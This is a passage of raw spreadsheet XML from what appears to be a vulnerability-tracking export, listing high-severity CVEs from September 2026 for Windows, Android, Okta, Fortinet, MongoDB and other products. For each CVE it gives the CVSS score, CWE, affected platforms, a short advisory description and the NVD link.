r="I351" s="5" t="inlineStr" /><c r="J351" s="5" t="inlineStr" /><c r="K351" s="5" t="inlineStr" /><c r="L351" s="5" t="inlineStr" /><c r="M351" s="5" t="inlineStr" /><c r="N351" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O351" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P351" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q351" s="5" t="inlineStr" /><c r="R351" s="5" t="inlineStr"><is><t>CWE-1327</t></is></c><c r="S351" s="5" t="inlineStr"><is><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is></c><c r="T351" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75021</t></is></c></row><row r="352"><c r="A352" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B352" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C352" s="5" t="inlineStr"><is><t>CVE-2026-77505</t></is></c><c r="D352" s="5" t="n"><v>8.1</v></c><c r="E352" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F352" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G352" s="5" t="inlineStr" /><c r="H352" s="5" t="n"><v>0.005</v></c><c r="I352" s="5" t="inlineStr" /><c r="J352" s="5" t="inlineStr" /><c r="K352" s="5" t="inlineStr" /><c r="L352" s="5" t="inlineStr" /><c r="M352" s="5" t="inlineStr" /><c r="N352" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O352" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P352" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q352" s="5" t="inlineStr" /><c r="R352" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S352" s="5" t="inlineStr"><is><t>Use after free in DNS Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T352" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77505</t></is></c></row><row r="353"><c r="A353" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B353" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C353" s="5" t="inlineStr"><is><t>CVE-2026-78444</t></is></c><c r="D353" s="5" t="n"><v>8.1</v></c><c r="E353" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F353" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G353" s="5" t="inlineStr" /><c r="H353" s="5" t="n"><v>0.005</v></c><c r="I353" s="5" t="inlineStr" /><c r="J353" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K353" s="5" t="inlineStr"><is><t>microsoft:windows_10_1809, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L353" s="5" t="inlineStr" /><c r="M353" s="5" t="inlineStr" /><c r="N353" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O353" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P353" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q353" s="5" t="inlineStr" /><c r="R353" s="5" t="inlineStr"><is><t>CWE-822</t></is></c><c r="S353" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in Windows Failover Cluster allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T353" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78444</t></is></c></row><row r="354"><c r="A354" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B354" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C354" s="5" t="inlineStr"><is><t>CVE-2026-78449</t></is></c><c r="D354" s="5" t="n"><v>8.1</v></c><c r="E354" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F354" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G354" s="5" t="inlineStr" /><c r="H354" s="5" t="n"><v>0.005</v></c><c r="I354" s="5" t="inlineStr" /><c r="J354" s="5" t="inlineStr" /><c r="K354" s="5" t="inlineStr" /><c r="L354" s="5" t="inlineStr" /><c r="M354" s="5" t="inlineStr" /><c r="N354" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O354" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P354" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q354" s="5" t="inlineStr" /><c r="R354" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S354" s="5" t="inlineStr"><is><t>Use after free in Reliable Multicast Transport Driver (RMCAST) allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T354" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78449</t></is></c></row><row r="355"><c r="A355" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B355" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C355" s="5" t="inlineStr"><is><t>CVE-2026-78450</t></is></c><c r="D355" s="5" t="n"><v>8.1</v></c><c r="E355" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F355" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G355" s="5" t="inlineStr" /><c r="H355" s="5" t="n"><v>0.005</v></c><c r="I355" s="5" t="inlineStr" /><c r="J355" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K355" s="5" t="inlineStr"><is><t>microsoft:windows_10_1809, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L355" s="5" t="inlineStr" /><c r="M355" s="5" t="inlineStr" /><c r="N355" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O355" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P355" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q355" s="5" t="inlineStr" /><c r="R355" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S355" s="5" t="inlineStr"><is><t>Use after free in Reliable Multicast Transport Driver (RMCAST) allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T355" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78450</t></is></c></row><row r="356"><c r="A356" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B356" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C356" s="5" t="inlineStr"><is><t>CVE-2026-78626</t></is></c><c r="D356" s="5" t="n"><v>8.1</v></c><c r="E356" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F356" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G356" s="5" t="inlineStr" /><c r="H356" s="5" t="n"><v>0.002</v></c><c r="I356" s="5" t="inlineStr" /><c r="J356" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K356" s="5" t="inlineStr" /><c r="L356" s="5" t="inlineStr" /><c r="M356" s="5" t="inlineStr" /><c r="N356" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O356" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P356" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q356" s="5" t="inlineStr" /><c r="R356" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S356" s="5" t="inlineStr"><is><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is></c><c r="T356" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78626</t></is></c></row><row r="357"><c r="A357" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B357" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C357" s="5" t="inlineStr"><is><t>CVE-2026-82066</t></is></c><c r="D357" s="5" t="n"><v>8.1</v></c><c r="E357" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F357" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G357" s="5" t="inlineStr" /><c r="H357" s="5" t="n"><v>0.002</v></c><c r="I357" s="5" t="inlineStr" /><c r="J357" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K357" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L357" s="5" t="inlineStr" /><c r="M357" s="5" t="inlineStr" /><c r="N357" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O357" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P357" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q357" s="5" t="inlineStr" /><c r="R357" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S357" s="5" t="inlineStr"><is><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is></c><c r="T357" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82066</t></is></c></row><row r="358"><c r="A358" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B358" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C358" s="5" t="inlineStr"><is><t>CVE-2026-83527</t></is></c><c r="D358" s="5" t="n"><v>8.1</v></c><c r="E358" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F358" s="5" t="inlineStr"><is><t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t></is></c><c r="G358" s="5" t="inlineStr" /><c r="H358" s="5" t="n"><v>0.015</v></c><c r="I358" s="5" t="inlineStr" /><c r="J358" s="5" t="inlineStr" /><c r="K358" s="5" t="inlineStr" /><c r="L358" s="5" t="inlineStr" /><c r="M358" s="5" t="inlineStr" /><c r="N358" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O358" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P358" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q358" s="5" t="inlineStr" /><c r="R358" s="5" t="inlineStr"><is><t>CWE-288</t></is></c><c r="S358" s="5" t="inlineStr"><is><t>An Authentication Bypass vulnerability in Sentry before R10.8.2, R10.7.3 and R10.6.4 allows a remote unauthenticated attacker to gain administrative level access.</t></is></c><c r="T358" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83527</t></is></c></row><row r="359"><c r="A359" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B359" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C359" s="5" t="inlineStr"><is><t>CVE-2026-83997</t></is></c><c r="D359" s="5" t="n"><v>8.1</v></c><c r="E359" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F359" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G359" s="5" t="inlineStr" /><c r="H359" s="5" t="n"><v>0.005</v></c><c r="I359" s="5" t="inlineStr" /><c r="J359" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K359" s="5" t="inlineStr"><is><t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L359" s="5" t="inlineStr" /><c r="M359" s="5" t="inlineStr" /><c r="N359" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O359" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P359" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q359" s="5" t="inlineStr" /><c r="R359" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S359" s="5" t="inlineStr"><is><t>Use after free in Windows Message Queuing allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T359" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83997</t></is></c></row><row r="360"><c r="A360" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B360" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C360" s="5" t="inlineStr"><is><t>CVE-2026-84393</t></is></c><c r="D360" s="5" t="n"><v>8.1</v></c><c r="E360" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F360" s="5" t="inlineStr"><is><t>psirt@fortinet.com</t></is></c><c r="G360" s="5" t="inlineStr" /><c r="H360" s="5" t="n"><v>0.002</v></c><c r="I360" s="5" t="inlineStr" /><c r="J360" s="5" t="inlineStr"><is><t>fortinet</t></is></c><c r="K360" s="5" t="inlineStr" /><c r="L360" s="5" t="inlineStr" /><c r="M360" s="5" t="inlineStr" /><c r="N360" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O360" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P360" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q360" s="5" t="inlineStr" /><c r="R360" s="5" t="inlineStr"><is><t>CWE-297</t></is></c><c r="S360" s="5" t="inlineStr"><is><t>A improper validation of certificate with host mismatch vulnerability in Fortinet FortiOS 7.6.1 through 7.6.6, FortiProxy 7.6.2 through 7.6.6 may allow attacker to information disclosure via &lt;insert attack vector here&gt;</t></is></c><c r="T360" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84393</t></is></c></row><row r="361"><c r="A361" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B361" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C361" s="5" t="inlineStr"><is><t>CVE-2026-86720</t></is></c><c r="D361" s="5" t="n"><v>8.1</v></c><c r="E361" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F361" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G361" s="5" t="inlineStr" /><c r="H361" s="5" t="n"><v>0.003</v></c><c r="I361" s="5" t="inlineStr" /><c r="J361" s="5" t="inlineStr" /><c r="K361" s="5" t="inlineStr" /><c r="L361" s="5" t="inlineStr" /><c r="M361" s="5" t="inlineStr" /><c r="N361" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O361" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P361" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q361" s="5" t="inlineStr" /><c r="R361" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="S361" s="5" t="inlineStr"><is><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is></c><c r="T361" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86720</t></is></c></row><row r="362"><c r="A362" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B362" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C362" s="5" t="inlineStr"><is><t>CVE-2026-86723</t></is></c><c r="D362" s="5" t="n"><v>8.1</v></c><c r="E362" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F362" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G362" s="5" t="inlineStr" /><c r="H362" s="5" t="n"><v>0.003</v></c><c r="I362" s="5" t="inlineStr" /><c r="J362" s="5" t="inlineStr" /><c r="K362" s="5" t="inlineStr" /><c r="L362" s="5" t="inlineStr" /><c r="M362" s="5" t="inlineStr" /><c r="N362" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O362" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P362" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q362" s="5" t="inlineStr" /><c r="R362" s="5" t="inlineStr"><is><t>CWE-287</t></is></c><c r="S362" s="5" t="inlineStr"><is><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is></c><c r="T362" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86723</t></is></c></row><row r="363"><c r="A363" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B363" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C363" s="5" t="inlineStr"><is><t>CVE-2026-28662</t></is></c><c r="D363" s="5" t="n"><v>8</v></c><c r="E363" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F363" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G363" s="5" t="inlineStr" /><c r="H363" s="5" t="n"><v>0.001</v></c><c r="I363" s="5" t="inlineStr" /><c r="J363" s="5" t="inlineStr" /><c r="K363" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L363" s="5" t="inlineStr" /><c r="M363" s="5" t="inlineStr" /><c r="N363" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O363" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P363" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q363" s="5" t="inlineStr" /><c r="R363" s="5" t="inlineStr"><is><t>CWE-122, CWE-787</t></is></c><c r="S363" s="5" t="inlineStr"><is><t>In p2p_process_prov_disc_bootstrap_req of p2p_pd.c, there is a possible out of bounds write due to a heap buffer overflow. This could lead to remote (proximal/adjacent) code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T363" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28662</t></is></c></row><row r="364"><c r="A364" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B364" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C364" s="5" t="inlineStr"><is><t>CVE-2026-55277</t></is></c><c r="D364" s="5" t="n"><v>8</v></c><c r="E364" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F364" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G364" s="5" t="inlineStr" /><c r="H364" s="5" t="n"><v>0.001</v></c><c r="I364" s="5" t="inlineStr" /><c r="J364" s="5" t="inlineStr" /><c r="K364" s="5" t="inlineStr" /><c r="L364" s="5" t="inlineStr" /><c r="M364" s="5" t="inlineStr" /><c r="N364" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O364" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P364" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q364" s="5" t="inlineStr" /><c r="R364" s="5" t="inlineStr"><is><t>CWE-120</t></is></c><c r="S364" s="5" t="inlineStr"><is><t>In checkUiccListenConfigNeeded of RoutingManager.cpp, there is a possible out of bounds write due to a missing bounds check. This could lead to remote (proximal/adjacent) code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T364" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-55277</t></is></c></row><row r="365"><c r="A365" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B365" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C365" s="5" t="inlineStr"><is><t>CVE-2026-68827</t></is></c><c r="D365" s="5" t="n"><v>8</v></c><c r="E365" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F365" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G365" s="5" t="inlineStr" /><c r="H365" s="5" t="n"><v>0.004</v></c><c r="I365" s="5" t="inlineStr" /><c r="J365" s="5" t="inlineStr" /><c r="K365" s="5" t="inlineStr" /><c r="L365" s="5" t="inlineStr" /><c r="M365" s="5" t="inlineStr" /><c r="N365" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O365" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P365" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q365" s="5" t="inlineStr" /><c r="R365" s="5" t="inlineStr"><is><t>CWE-122, CWE-191</t></is></c><c r="S365" s="5" t="inlineStr"><is><t>Integer underflow (wrap or wraparound) in Windows GDI+ allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T365" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68827</t></is></c></row><row r="366"><c r="A366" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B366" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C366" s="5" t="inlineStr"><is><t>CVE-2026-68834</t></is></c><c r="D366" s="5" t="n"><v>8</v></c><c r="E366" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F366" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G366" s="5" t="inlineStr" /><c r="H366" s="5" t="n"><v>0.006</v></c><c r="I366" s="5" t="inlineStr" /><c r="J366" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K3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6" s="5" t="inlineStr" /><c r="M366" s="5" t="inlineStr" /><c r="N366" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O366" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P366" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q366" s="5" t="inlineStr" /><c r="R366" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S366" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows NTFS allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T366" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68834</t></is></c></row><row r="367"><c r="A367" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B367" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C367" s="5" t="inlineStr"><is><t>CVE-2026-68838</t></is></c><c r="D367" s="5" t="n"><v>8</v></c><c r="E367" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F367" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G367" s="5" t="inlineStr" /><c r="H367" s="5" t="n"><v>0.004</v></c><c r="I367" s="5" t="inlineStr" /><c r="J367" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K36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7" s="5" t="inlineStr" /><c r="M367" s="5" t="inlineStr" /><c r="N367" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O367" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P367" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q367" s="5" t="inlineStr" /><c r="R367" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S367" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows NTFS allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T367" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68838</t></is></c></row><row r="368"><c r="A368" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B368" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C368" s="5" t="inlineStr"><is><t>CVE-2026-68876</t></is></c><c r="D368" s="5" t="n"><v>8</v></c><c r="E368" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F368" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G368" s="5" t="inlineStr" /><c r="H368" s="5" t="n"><v>0.007</v></c><c r="I368" s="5" t="inlineStr" /><c r="J368" s="5" t="inlineStr" /><c r="K368" s="5" t="inlineStr" /><c r="L368" s="5" t="inlineStr" /><c r="M368" s="5" t="inlineStr" /><c r="N368" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O368" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P368" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q368" s="5" t="inlineStr" /><c r="R368" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S368" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Program Compatibility Assistant Service allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T368" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68876</t></is></c></row><row r="369"><c r="A369" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B369" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C369" s="5" t="inlineStr"><is><t>CVE-2026-68878</t></is></c><c r="D369" s="5" t="n"><v>8</v></c><c r="E369" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F369" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G369" s="5" t="inlineStr" /><c r="H369" s="5" t="n"><v>0.005</v></c><c r="I369" s="5" t="inlineStr" /><c r="J369" s="5" t="inlineStr" /><c r="K369" s="5" t="inlineStr" /><c r="L369" s="5" t="inlineStr" /><c r="M369" s="5" t="inlineStr" /><c r="N369" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O369" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P369" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q369" s="5" t="inlineStr" /><c r="R369" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S369" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows Fast FAT Driver allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T369" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68878</t></is></c></row><row r="370"><c r="A370" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B370" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C370" s="5" t="inlineStr"><is><t>CVE-2026-68880</t></is></c><c r="D370" s="5" t="n"><v>8</v></c><c r="E370" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F370" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G370" s="5" t="inlineStr" /><c r="H370" s="5" t="n"><v>0.004</v></c><c r="I370" s="5" t="inlineStr" /><c r="J370" s="5" t="inlineStr" /><c r="K370" s="5" t="inlineStr" /><c r="L370" s="5" t="inlineStr" /><c r="M370" s="5" t="inlineStr" /><c r="N370" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O370" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P370" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q370" s="5" t="inlineStr" /><c r="R370" s="5" t="inlineStr"><is><t>CWE-122, CWE-197</t></is></c><c r="S370" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T370" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68880</t></is></c></row><row r="371"><c r="A371" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B371" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C371" s="5" t="inlineStr"><is><t>CVE-2026-68894</t></is></c><c r="D371" s="5" t="n"><v>8</v></c><c r="E371" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F371" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G371" s="5" t="inlineStr" /><c r="H371" s="5" t="n"><v>0.006</v></c><c r="I371" s="5" t="inlineStr" /><c r="J371" s="5" t="inlineStr" /><c r="K371" s="5" t="inlineStr" /><c r="L371" s="5" t="inlineStr" /><c r="M371" s="5" t="inlineStr" /><c r="N371" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O371" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P371" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q371" s="5" t="inlineStr" /><c r="R371" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S371" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T371" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68894</t></is></c></row><row r="372"><c r="A372" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B372" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C372" s="5" t="inlineStr"><is><t>CVE-2026-69271</t></is></c><c r="D372" s="5" t="n"><v>8</v></c><c r="E372" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F372" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G372" s="5" t="inlineStr" /><c r="H372" s="5" t="n"><v>0.007</v></c><c r="I372" s="5" t="inlineStr" /><c r="J372" s="5" t="inlineStr" /><c r="K372" s="5" t="inlineStr" /><c r="L372" s="5" t="inlineStr" /><c r="M372" s="5" t="inlineStr" /><c r="N372" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O372" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P372" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q372" s="5" t="inlineStr" /><c r="R372" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S372" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T372" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69271</t></is></c></row><row r="373"><c r="A373" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B373" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C373" s="5" t="inlineStr"><is><t>CVE-2026-69301</t></is></c><c r="D373" s="5" t="n"><v>8</v></c><c r="E373" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F373" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G373" s="5" t="inlineStr" /><c r="H373" s="5" t="n"><v>0.008</v></c><c r="I373" s="5" t="inlineStr" /><c r="J373" s="5" t="inlineStr" /><c r="K373" s="5" t="inlineStr" /><c r="L373" s="5" t="inlineStr" /><c r="M373" s="5" t="inlineStr" /><c r="N373" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O373" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P373" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q373" s="5" t="inlineStr" /><c r="R373" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S373" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T373" s="6" 